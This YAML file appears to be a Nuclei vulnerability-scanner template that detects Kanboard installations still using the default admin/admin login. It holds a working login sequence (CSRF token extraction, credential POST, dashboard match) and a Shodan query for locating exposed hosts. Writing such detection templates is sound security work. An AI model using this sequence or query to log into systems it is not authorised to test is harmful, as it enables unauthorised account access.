67 lines
1.7 KiB
YAML
67 lines
1.7 KiB
YAML
id: kanboard-default-login
|
|
|
|
info:
|
|
name: Kanboard - Default Login
|
|
author: shelled
|
|
severity: high
|
|
description: Kanboard contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
|
|
reference:
|
|
- https://twitter.com/0x_rood/status/1607068644634157059
|
|
- https://github.com/kanboard/kanboard
|
|
- https://docs.kanboard.org/v1/admin/installation/
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
|
cvss-score: 8.3
|
|
cwe-id: CWE-522
|
|
metadata:
|
|
verified: true
|
|
shodan-query: http.favicon.hash:2056442365
|
|
tags: default-login,kanboard
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /?controller=AuthController&action=login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
POST /?controller=AuthController&action=check HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
username={{user}}&password={{pass}}&csrf_token={{csrf_token}}
|
|
|
|
- |
|
|
GET /?controller=DashboardController&action=show HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
attack: pitchfork
|
|
payloads:
|
|
user:
|
|
- admin
|
|
pass:
|
|
- admin
|
|
extractors:
|
|
- type: regex
|
|
name: csrf_token
|
|
part: body
|
|
internal: true
|
|
group: 1
|
|
regex:
|
|
- "hidden\" name=\"csrf_token\" value=\"([0-9a-z]+)\""
|
|
cookie-reuse: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- 'New project'
|
|
- 'Project management'
|
|
condition: and
|
|
case-insensitive: true
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by md on 2023/01/06
|